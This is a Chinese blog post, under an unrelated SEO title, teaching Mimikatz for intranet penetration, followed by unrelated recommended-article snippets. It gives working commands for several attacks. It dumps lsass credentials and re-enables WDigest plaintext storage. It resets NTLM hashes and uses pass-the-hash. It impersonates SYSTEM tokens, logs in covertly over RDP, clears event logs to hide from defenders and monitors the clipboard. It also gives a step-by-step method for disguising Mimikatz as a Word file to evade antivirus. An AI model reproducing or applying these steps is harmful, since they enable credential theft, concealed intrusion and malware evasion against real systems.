360病毒库升级包,内网渗透的基本原理

0x01 工具介绍工具原理Mimikatz 的主要原理是在 Windows 系统中用户登录后系统会将身份凭证存储于lsass.exe进程的内存当中,Mimikatz 通过注入lsass.exe进程读取进程内存,从中获取对应的明文密码。常见问题在 Windows Vista 系统之后不再存储 LM HASH,而 Windows 8.1 系统之后内存中也不再存储明文密码,因此在高版本 Windows 系统中无法利用 Mimikatz 直接读取明文密码。Mimikatz 能获取明文密码的关键是 wdigest,这是一个可逆算法,相关注册表存储位置如下:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD)后续高版本的 Windows 系统不能读取明文是因为关闭了该注册表键,如果想要重新获取明文,只需要开启该注册表后再输入密码重新登录即可。

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1给小伙伴整理了相对应的学习资料,如果你需要的话,我也可以分享一部分出来(涉密部分分享不了),需要的可以

【一帮助网络安全学习一】关注我,私信回复“资料”免费领取256G网络安全自学资料0x02 基础使用常见用法Mimikatz 的启动需要管理员/SYSTEM权限运行,默认情况下拥有 32 位以及 64 位版本,在 Kali Linux 中默认存放位置为/usr/share/mimikatz,大多数人使用 Mimikatz 一般只用到两个命令,而对其他命令不太了解,接下来会为大家全面介绍 Mimikatz 这款神器。

privilege::debugsekurlsa::logonpasswords也可以使用一句话输出保存

mimikatz.exe “sekurlsa::minidump lsass.dmp” “sekurlsa::logonpasswords” “exit”> pssword.txt基本语法使用命令可查看全部功能模块

::

调试进程修改运行权限为SYSTEM

privilege::debugprivilege:: #查看 privilege 的运行模块

开启日志记录,保存读取的用户凭证信息

standard::log

0x03 常用模块Crypto模块加密模块主要用于导出可导出的证书,利用 CryptoAPI 函数访问证书,相当于简化版的 certutil。有时候一张合法的证书非常有用,当利用合法证书生成木马程序时可能被杀软认做白名单程序从而不进行查杀。相关参数如下:

/provider #指定提供者/providertype #指定提供类型/cngprovider #CNG提供者/export #导出密钥 PVK 文件

查看相关密钥的提供者

crypto::providers

 

查看当前系统存储信息

crypto::stores

 

常见的系统存储用户名包括:CURRENT_USERUSER_GROUP_POLICYLOCAL_MACHINELOCAL_MACHINE_GROUPLOCAL_MACHINE_ENTERPRISECURRENT_SERVICEUSERSSERVICES指定系统存储为local_machine进行查看

crypto::stores /systemstore:local_machine

 

查看用户当前证书

crypto::certificates

导出 ROOT 根证书

crypto::certificates /store:Root

 

导出证书必须配合 store 参数。其中公钥为DER,私钥为PFX,密码为 mimikatz

crypto::certificates /store:Root /export

 

使用 CryptoAPI 打补丁,有时候证书无法导出可能就是补丁没有打

crypto::capi

使用 CNG 打补丁,用于导出未标记可导出的证书

crypto::cng

列出智能读卡器,可能会出现报错

crypto::sc

查看相关密钥

crypto::key

 

使用 OpenSSL 生成证书

openssl rsa -inform pvk -in key.pvk -outform pem -out key.pemSekurlsa模块Sekurlsa 模块能从lsass.exe进程中提取 passwords、keys、pin、tickets 等用户凭据信息,是最常用到模块。查看所有身份认证信息,成功拿到用户明文密码

sekurlsa::logonpasswords

 

查看用户哈希可能会出现报错,这主要是由于当前权限较低

lsadump::sam

解决方法非常简单,只要以系统权限运行即可

process::runp在新窗口中再次运行可成功拿到哈希

重置用户 NTLM 哈希会把哈希直接写入 SAM 数据库当中,因此执行该操作相当于重置密码,再次登录需要使用新密码进行登录

lsadump::setntlm /user:admin /ntlm:b2781ba85ac750ec286744b009599637

 

转储并导出lsass.exe进程

sekurlsa::minidump lsass.tmp通过哈希传递进行横向移动

sekurlsa::pth /user:admin /domain:host1 /ntlm:b2781ba85ac750ec286744b009599637sekurlsa::pth /user:admin /domain:host1 /aes256:b2781ba85ac750ec286744b009599637凭证管理器中可查看 Windows 凭证

Token模块Token 模块主要用于查看、假冒现有 token。查看当前 token 信息

token::whoami

查看 token 列表并假冒系统管理员

token::listtoken::elevate /NT AUTHORITY\SYSTEM

 

还原假冒进程

token::revert

其他模块一般情况下重复登录远程桌面会导致已登录用户会直接退出或提示有其他用户登录

 

配合命令无提示登录远程桌面,该功能在 HW 中非常好用,即使管理员处于登录状态,我们仍能悄悄登录其他用户

ts::multirdp

成功登录原会话不受影响,使用命令查看会话列表

ts::sessions

 

虽然目前不会被已登录用户发现,但在事件查看器当中仍会存在登录日志

 

使用命令一键清除日志

event::clear

成功清除日志后蓝队工程师无法通过系统日志来还原攻击过程

 

安装/卸载 Mimikatz 服务,帮助我们监听用户输入

service::+service::-

成功安装 Mimikatz 服务且已自动启动

 

比如监听粘贴文本

misc::clip

0x04 免杀利用Mimikatz 作为最常用的黑客工具早已被各大安全软件标记,比如360杀毒、360安全卫士、卡巴斯基等。使用源码免杀能帮助我们绕过杀毒软件的查杀,这是一种基于特征码的免杀方式,只需定位到源码中的特征代码进行修改就可达到免杀效果,一般会定位三个位置,分别是代码、字符串和输入表。准备环境在免杀前需要准备以下三个要素:Mimikatz 源码Visual Stdio 2019(C++)vc依赖文件在 Github 中下载最新版的 Mimikatz

下载地址:https://github.com/gentilkiwi/mimikatz

 

更新 360 杀毒、病毒库为最新版本

配置问题点击 Mimikatz 中的启动文件启动 Visual Stdio,在帮助菜单》关于〉查看许可证状态中输入激活证书可成功激活。而在 VS 2012 中如果出现报错信息(error MSB8020),解决方法为进入项目》属性〉常规》平台工作集中,将平台改为 VS 2012(v110)后即可成功运行编译。

 

选择生成出现报错界面,点击工具》获取工具和功能〉C++ 进行桌面开发》C++ Windows XP Support for VS 2017 v141,点击修改即可解决问题

 

下载安装完成后修改手工工具集为 2017 版本

 

在配置属性中的 C++ 中修改将警告视为错误改为否,否则每当出现错误就无法编译

重新生成又出现报错:MSB8036

在项目属性页选择已安装的 SDK 版本

点击重新生成后成功编译 32 位 Mimikatz

 

如果需要生成 64 位程序可在解决方案》配置属性选择平台为x64

点击重新生成成功编译 64 位 Mimikatz

免杀过程步入正题选择项目 mimikatz 的编辑》查找和替换》在文件中替换

把关键字 mimikatz 所有的字符串替换为 macsec,点击全部替换即可

由于字符串全部被替换,导致引入 mimikatz 的文件名也被替换,因此需修改全部文件名为 macsec

点击重新生成后输出macsec.exe

虽然目前能够进行静态查杀,但是还是无法绕过动态查杀

 

进一步删除macsec.c和macsec.h的注释信息

再次重新生成程序使用360测试仍无法绕过动态查杀

 

在macsec.rc中修改版本信息,把带有 gentilkiwi 的公司名修改为 macsec

 

修改图标macsec.ico为 Office Word 图标后再次点击生成

放入免杀环境再次运行即可成功绕过

当然命令也能够成功执行

 

完成免杀后可上传至云平台查杀测试,但一般不要这么做,云平台会标记免杀程序

本站部分内容由互联网用户自发贡献,该文观点仅代表作者本人,本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。

如发现本站有涉嫌抄袭侵权/违法违规等内容,请联系我们举报!一经查实,本站将立刻删除。

(0)

相关推荐

  • 电脑配置检测软件,怎么查看电脑配置怎么看

    案例:怎么看电脑配置 【请问大家怎么才能知道电脑的配置是怎样的呀?跪求一个查看电脑配置的方法,感谢大家!】 电脑配置可能对于一些专业人员来说是很熟悉的一个名词,但对于某些电脑小白来说会略微陌生,怎么查看电脑配置呢?不同的电脑配置有什么不同的作用呢? 这4种关于快速查看电脑配置的方式,你知道几种呢? 一、怎么查看电脑配置?不同的电脑配置可能会给用户不同的体验感…

    2023-07-01
  • 双极化高频头(双极化高频头探针安装方向)

    记者 赵鹏 1月16日11时02分,我国在酒泉卫星发射中心用快舟一号甲运载火箭,成功将国内首颗通信能力达10Gbps的低轨宽带通信卫星——银河航天首发星发射升空。记者了解到,这也是我国首颗对标国际水平的5G低轨宽带通信卫星,将通过地面站逐步为各地提供5G通信服务。 5G领先从地面迈向太空 伴随着银河航天首发星顺利进入预定轨道,我国已经迈出了5G“太空通信”征…

    用户投稿 2023-05-24
  • 北京轻工技师学院招聘,北京市自动化工程学校招聘信息

      北京市自动化工程学校,创建于1964 年,是一所隶属北京市教委的全日制普通中等专业学校,国家级重点中等职业学校、北京市职业教育先进单位、首都文明单位、全国职工职业技能大赛优秀组织单位。学校坚持“建设智能专业领域知名学校”的办学定位和“一体两翼多功能”的办学格局,设有信息技术类、智能制造类、轨道交通类三大专业群。其中,人工智能技术应用专业、虚拟现…

    用户投稿 2023-07-02
  • 凭爱意将月光私有短剧,凭爱意将月光私有短剧全集

    《凭爱意将月光私有短剧:探索其魅力与运营之道》 在当今的影视娱乐领域,各种类型的短剧如雨后春笋般涌现,其中“凭爱意将月光私有短剧”以其独特的情感表达和细腻的叙事方式,吸引了众多观众的目光。 那么,这种短剧究竟有何魅力?又该如何进行有效的SEO运营呢?让我们一起来深入探讨。 一、短剧的魅力所在 (一)情感共鸣 这种短剧往往能够精准地捕捉到人类情感的细微之处,也…

    用户投稿 2025-03-12
  • 游戏代理如何做?四大运营流程了解一下

    手机游戏已成为这个时代许多人的必需品。只需一部手机即可立即打开游戏,随时随地享受手机游戏的乐趣。 说到手机游戏代理项目,可以说是一种投资轻、产量高的行业,创业风险小。与其他特许经营权不同,手机游戏代理行业只需提前投入时间、精力和耐心,就可以获得更好的回报。 那么,手游代理具体该如何去做?四大运营流程了解一下! 一、吸引用户进群 做好游戏代理的第一步是吸引足够…

    2022-06-01
  • 触摸板驱动,触摸板驱动如何安装

      液晶显示器驱动板几种常见故障的检修 现象:电源板输出电压正常,但是按开关没反应: 从先易后难的顺序着手检查 目测板子有无元件异常,通电用手触摸板子各处,看有无温度异常,有时处理芯片坏了温度很高,一摸就发现了 然后我习惯先检查驱动板上的各个供电。 由于电源板输出通常只有12v和5v,所以驱动板上都有几个DC/DC稳压器来转换驱动板所需的电压。 (…

    2023-07-12 用户投稿
  • 河北邢台水灾,邢台洪水事件真相

    5月17日,在河北邢台,有人爆料,当地中华大街和钢铁路路面有大面积积水情况,疑似供水管道爆裂。 同日,邢台水业集团有限公司工作人员证实,该情况是由水管爆裂造成,具体原因尚未得知,目前已有供水公司相关部门在现场进行抢修。 5月17日上午,邢台当地人爆料称,钢铁路和中华大街上“发洪水了”,疑似供水公司主水管爆裂。 路面大量积水。图/视频截图 现场视频显示,当地天…

    2023-06-23
  • 淘宝金牌卖家申请入口(淘宝加入金牌卖家的条件要求)

    什么是金牌卖家?金牌卖家是对一段时间内成交好、服务好、口碑好的卖家的一种激励手段,淘宝运用数据、通过给卖家打标的方式完成。金牌卖家有如下好处: 1、 金牌卖家图标将在搜索结果页、店铺列表页、店铺首页、宝贝详情页、旺旺买家端等多个场景穿透,不断加强买家的认知度,提升店铺信誉和潜在转化率; 2、 活动审核优先权:“金牌卖家”在招商平台中拥有同等条件下优先活动入选…

    2022-09-22 用户投稿
  • 简单营养早餐做法(儿童早餐简单营养早餐做法)

    “一日之计在于晨”,青少年正是发育长身体的时候,一定要吃得好又吃得饱,尤其碰上挑食的孩子就更犯愁了,今天,和大家分享5道小朋友都喜欢的早餐,搭配均衡,简单好做,而且最快的10分钟就能上桌,有喜欢的宝妈们赶紧收藏起来吧。 鸡蛋羹 1.准备食材: 在碗中打入三个鸡蛋,加入少许食盐入底味,淋入一点芝麻香油,用筷子搅散,倒入300毫升的纯牛奶搅拌均匀备用。 再准备一…

    2022-05-06 用户投稿
  • 防城港社区 ,十万大山国家森林公园旅游攻略

    防城港是广西壮族自治区下辖的地级市,环北部湾城市群城市,是一座滨海城市、边关城市、港口城市,位于中国大陆海岸线的最西南端,背靠大西南,面向东南亚,南临北部湾,西南与越南接壤,海岸线580公里,陆地边界100.895公里,是北部湾畔唯一的全海景生态海湾城市,被誉为“西南门户、边陲明珠”,是中国氧都、中国金花茶之乡、中国白鹭之乡、中国长寿之乡、广西第二大侨乡。城…

    2023-06-07
  • 做什么网站赚钱(个人做什么网站盈利)

    首先我们来看一组数据: CNNIC近期发布2021年中国网站最新数量报告,截至2021年6月,我国网站数量累计为422万个! 网站数量统计 2018年6月到2021年6月国内网站一直在减少,这也是预示了网站不再吃香? 作为一个十几年的老站长,亲身经历了互联网的巨大变化,以前不管是上网打游戏、看电影、查资料、聊天交友需要PC。也正是在那个年代网站体现出来了它的…

    2021-11-01 用户投稿
  • 骆驼祥子读书笔记摘抄(骆驼祥子读书笔记摘抄第十章)

    个别的解决,祥子没那么聪明。全盘的清算,他没那个魄力。于是,一点儿办法没有,整天际圈着满肚子委屈。正和一切的生命同样,受了损害之后,无可如何的只想由自己去收拾残局。那斗落了大腿的蟋蟀,还想用那些小腿儿爬。祥子没有一定的主意,只想慢慢的一天天,一件件的挨过去,爬到哪儿算哪儿,根本不想往起跳了。 离二十七还有十多天,他完全注意到这一天上去,心里想的,口中念道的,…

    2022-05-05